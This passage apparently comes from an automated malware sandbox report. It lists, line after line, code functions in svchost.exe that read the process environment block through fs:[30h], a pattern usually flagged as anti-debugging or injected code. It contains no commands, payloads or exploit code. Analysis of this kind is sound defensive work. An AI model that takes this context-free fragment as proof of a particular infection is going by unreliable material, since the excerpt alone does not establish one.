            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF61C3 mov eax, dword ptr fs:[00000030h]2_2_03CF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF61C3 mov eax, dword ptr fs:[00000030h]2_2_03CF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03CAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D061E5 mov eax, dword ptr fs:[00000030h]2_2_03D061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C601F8 mov eax, dword ptr fs:[00000030h]2_2_03C601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C70185 mov eax, dword ptr fs:[00000030h]2_2_03C70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEC188 mov eax, dword ptr fs:[00000030h]2_2_03CEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEC188 mov eax, dword ptr fs:[00000030h]2_2_03CEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD4180 mov eax, dword ptr fs:[00000030h]2_2_03CD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD4180 mov eax, dword ptr fs:[00000030h]2_2_03CD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h]2_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h]2_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h]2_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h]2_2_03CB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A197 mov eax, dword ptr fs:[00000030h]2_2_03C2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A197 mov eax, dword ptr fs:[00000030h]2_2_03C2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A197 mov eax, dword ptr fs:[00000030h]2_2_03C2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]2_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]2_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov ecx, dword ptr fs:[00000030h]2_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]2_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]2_2_03CC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C156 mov eax, dword ptr fs:[00000030h]2_2_03C2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC8158 mov eax, dword ptr fs:[00000030h]2_2_03CC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36154 mov eax, dword ptr fs:[00000030h]2_2_03C36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36154 mov eax, dword ptr fs:[00000030h]2_2_03C36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04164 mov eax, dword ptr fs:[00000030h]2_2_03D04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04164 mov eax, dword ptr fs:[00000030h]2_2_03D04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h]2_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h]2_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h]2_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h]2_2_03CDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov ecx, dword ptr fs:[00000030h]2_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov eax, dword ptr fs:[00000030h]2_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov eax, dword ptr fs:[00000030h]2_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov eax, dword ptr fs:[00000030h]2_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF0115 mov eax, dword ptr fs:[00000030h]2_2_03CF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C60124 mov eax, dword ptr fs:[00000030h]2_2_03C60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB20DE mov eax, dword ptr fs:[00000030h]2_2_03CB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_03C2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C380E9 mov eax, dword ptr fs:[00000030h]2_2_03C380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB60E0 mov eax, dword ptr fs:[00000030h]2_2_03CB60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C0F0 mov eax, dword ptr fs:[00000030h]2_2_03C2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C720F0 mov ecx, dword ptr fs:[00000030h]2_2_03C720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3208A mov eax, dword ptr fs:[00000030h]2_2_03C3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C280A0 mov eax, dword ptr fs:[00000030h]2_2_03C280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC80A8 mov eax, dword ptr fs:[00000030h]2_2_03CC80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF60B8 mov eax, dword ptr fs:[00000030h]2_2_03CF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF60B8 mov ecx, dword ptr fs:[00000030h]2_2_03CF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32050 mov eax, dword ptr fs:[00000030h]2_2_03C32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6050 mov eax, dword ptr fs:[00000030h]2_2_03CB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5C073 mov eax, dword ptr fs:[00000030h]2_2_03C5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB4000 mov ecx, dword ptr fs:[00000030h]2_2_03CB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A020 mov eax, dword ptr fs:[00000030h]2_2_03C2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C020 mov eax, dword ptr fs:[00000030h]2_2_03C2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC6030 mov eax, dword ptr fs:[00000030h]2_2_03CC6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3C7C0 mov eax, dword ptr fs:[00000030h]2_2_03C3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB07C3 mov eax, dword ptr fs:[00000030h]2_2_03CB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C527ED mov eax, dword ptr fs:[00000030h]2_2_03C527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C527ED mov eax, dword ptr fs:[00000030h]2_2_03C527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C527ED mov eax, dword ptr fs:[00000030h]2_2_03C527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBE7E1 mov eax, dword ptr fs:[00000030h]2_2_03CBE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C347FB mov eax, dword ptr fs:[00000030h]2_2_03C347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C347FB mov eax, dword ptr fs:[00000030h]2_2_03C347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD678E mov eax, dword ptr fs:[00000030h]2_2_03CD678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C307AF mov eax, dword ptr fs:[00000030h]2_2_03C307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE47A0 mov eax, dword ptr fs:[00000030h]2_2_03CE47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6674D mov esi, dword ptr fs:[00000030h]2_2_03C6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6674D mov eax, dword ptr fs:[00000030h]2_2_03C6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6674D mov eax, dword ptr fs:[00000030h]2_2_03C6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30750 mov eax, dword ptr fs:[00000030h]2_2_03C30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBE75D mov eax, dword ptr fs:[00000030h]2_2_03CBE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72750 mov eax, dword ptr fs:[00000030h]2_2_03C72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72750 mov eax, dword ptr fs:[00000030h]2_2_03C72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB4755 mov eax, dword ptr fs:[00000030h]2_2_03CB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38770 mov eax, dword ptr fs:[00000030h]2_2_03C38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C700 mov eax, dword ptr fs:[00000030h]2_2_03C6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30710 mov eax, dword ptr fs:[00000030h]2_2_03C30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C60710 mov eax, dword ptr fs:[00000030h]2_2_03C60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C720 mov eax, dword ptr fs:[00000030h]2_2_03C6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C720 mov eax, dword ptr fs:[00000030h]2_2_03C6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6273C mov eax, dword ptr fs:[00000030h]2_2_03C6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6273C mov ecx, dword ptr fs:[00000030h]2_2_03C6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6273C mov eax, dword ptr fs:[00000030h]2_2_03C6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAC730 mov eax, dword ptr fs:[00000030h]2_2_03CAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_03C6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A6C7 mov eax, dword ptr fs:[00000030h]2_2_03C6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB06F1 mov eax, dword ptr fs:[00000030h]2_2_03CB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB06F1 mov eax, dword ptr fs:[00000030h]2_2_03CB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34690 mov eax, dword ptr fs:[00000030h]2_2_03C34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34690 mov eax, dword ptr fs:[00000030h]2_2_03C34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C6A6 mov eax, dword ptr fs:[00000030h]2_2_03C6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C666B0 mov eax, dword ptr fs:[00000030h]2_2_03C666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4C640 mov eax, dword ptr fs:[00000030h]2_2_03C4C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF866E mov eax, dword ptr fs:[00000030h]2_2_03CF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF866E mov eax, dword ptr fs:[00000030h]2_2_03CF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A660 mov eax, dword ptr fs:[00000030h]2_2_03C6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A660 mov eax, dword ptr fs:[00000030h]2_2_03C6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C62674 mov eax, dword ptr fs:[00000030h]2_2_03C62674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE609 mov eax, dword ptr fs:[00000030h]2_2_03CAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72619 mov eax, dword ptr fs:[00000030h]2_2_03C72619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E627 mov eax, dword ptr fs:[00000030h]2_2_03C4E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C66620 mov eax, dword ptr fs:[00000030h]2_2_03C66620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C68620 mov eax, dword ptr fs:[00000030h]2_2_03C68620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3262C mov eax, dword ptr fs:[00000030h]2_2_03C3262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E5CF mov eax, dword ptr fs:[00000030h]2_2_03C6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E5CF mov eax, dword ptr fs:[00000030h]2_2_03C6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C365D0 mov eax, dword ptr fs:[00000030h]2_2_03C365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03C6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03C6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C325E0 mov eax, dword ptr fs:[00000030h]2_2_03C325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C5ED mov eax, dword ptr fs:[00000030h]2_2_03C6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C5ED mov eax, dword ptr fs:[00000030h]2_2_03C6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32582 mov eax, dword ptr fs:[00000030h]2_2_03C32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32582 mov ecx, dword ptr fs:[00000030h]2_2_03C32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C64588 mov eax, dword ptr fs:[00000030h]2_2_03C64588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E59C mov eax, dword ptr fs:[00000030h]2_2_03C6E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB05A7 mov eax, dword ptr fs:[00000030h]2_2_03CB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB05A7 mov eax, dword ptr fs:[00000030h]2_2_03CB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB05A7 mov eax, dword ptr fs:[00000030h]2_2_03CB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C545B1 mov eax, dword ptr fs:[00000030h]2_2_03C545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C545B1 mov eax, dword ptr fs:[00000030h]2_2_03C545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38550 mov eax, dword ptr fs:[00000030h]2_2_03C38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38550 mov eax, dword ptr fs:[00000030h]2_2_03C38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6656A mov eax, dword ptr fs:[00000030h]2_2_03C6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6656A mov eax, dword ptr fs:[00000030h]2_2_03C6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6656A mov eax, dword ptr fs:[00000030h]2_2_03C6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC6500 mov eax, dword ptr fs:[00000030h]2_2_03CC6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04500 mov eax, dword ptr fs:[00000030h]2_2_03D04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40535 mov eax, dword ptr fs:[00000030h]2_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]2_2_03C5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]2_2_03C5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]2_2_03C5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]2_2_03C5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E53E mov eax, dword ptr fs:[00000030h]2_2_03C5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C304E5 mov ecx, dword ptr fs:[00000030h]2_2_03C304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEA49A mov eax, dword ptr fs:[00000030h]2_2_03CEA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C364AB mov eax, dword ptr fs:[00000030h]2_2_03C364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C644B0 mov ecx, dword ptr fs:[00000030h]2_2_03C644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBA4B0 mov eax, dword ptr fs:[00000030h]2_2_03CBA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h]2_2_03C6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEA456 mov eax, dword ptr fs:[00000030h]2_2_03CEA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2645D mov eax, dword ptr fs:[00000030h]2_2_03C2645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5245A mov eax, dword ptr fs:[00000030h]2_2_03C5245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBC460 mov ecx, dword ptr fs:[00000030h]2_2_03CBC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5A470 mov eax, dword ptr fs:[00000030h]2_2_03C5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5A470 mov eax, dword ptr fs:[00000030h]2_2_03C5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5A470 mov eax, dword ptr fs:[00000030h]2_2_03C5A470
